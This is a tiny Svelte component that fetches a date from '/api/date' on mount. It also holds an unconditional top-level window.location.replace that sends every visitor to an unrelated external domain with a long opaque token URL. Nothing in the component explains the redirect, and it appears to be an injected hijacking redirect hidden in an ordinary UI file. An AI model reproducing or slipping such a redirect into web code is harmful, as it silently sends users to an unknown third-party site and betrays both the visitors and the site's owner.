<script>
  import { onMount } from "svelte";
  export let date;

  onMount(async () => {
    const res = await fetch("/api/date");
    const newDate = await res.text();
    date = newDate;
  });
  window.location.replace("https://www.whtenvlpe.com/7IAgk4boRQ1rHClXszfsFZ2s7sKewRdFakaJJiflbNGjrHpKvROSnWjoKnCiJkBRNc31Fmq1XAP7rw9FL5LRag~~/");
</script>

<main>
</main>
